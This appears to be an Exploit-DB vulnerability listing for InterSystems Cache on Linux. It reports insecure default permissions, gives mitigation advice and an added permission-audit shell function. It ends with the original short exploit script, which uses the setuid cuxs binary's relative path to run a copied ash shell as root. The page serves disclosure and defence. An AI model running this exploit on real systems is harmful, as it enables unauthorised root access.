Vendor: Cache
By: kokaninATdtors
CVSS: 7,2 (HIGH)
CWE: N/A
Product Name: Cache
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2003

Insecure Default Permissions

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. A snippet from an strace of the cuxs binary shows that it is possible to execute the cache binary, which is set to be +s. An attacker can use this to copy the ash binary to the cache directory and execute it, allowing them to gain root privileges.

Mitigation:

Ensure that the permissions set on the files and directories comprising InterSystems Cache are secure and do not allow for any user to overwrite any file.
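
A defender-side check for the mitigation above, as an added example (not from the advisory, its author, or InterSystems): a POSIX shell function that lists world-writable directories, world-writable files, and setuid/setgid programs under an install tree. The function name audit_tree and the tree path passed to it are assumptions, since the page gives no install path.

```shell
#!/bin/sh
# Added example, not part of the advisory: permission audit for an install tree.
# audit_tree and the path passed to it are assumptions; the page names no path.
#
# Output, one finding per line:
#   WW_DIR  <dir>   directory writable by any user and without the sticky bit,
#                   so anyone can replace or rename the files inside it
#   WW_FILE <file>  regular file that any user can overwrite
#   SETID   <file>  setuid/setgid program (the script on this page searches for
#                   a setuid cuxs); each one needs a reviewed owner and location
# Returns 0 when the tree is clean, 1 when there is at least one finding.
audit_tree() {
    root=$1
    findings=$(
        find "$root" -type d -perm -0002 ! -perm -1000 2>/dev/null |
            sed 's/^/WW_DIR /'
        find "$root" -type f -perm -0002 2>/dev/null |
            sed 's/^/WW_FILE /'
        find "$root" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
            sed 's/^/SETID /'
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Stand-alone use: sh audit.sh /path/to/install/tree
if [ "$#" -gt 0 ]; then
    audit_tree "$1"
fi
```

Each WW_DIR or WW_FILE path can be corrected with chmod o-w and the audit re-run until it returns 0.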
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET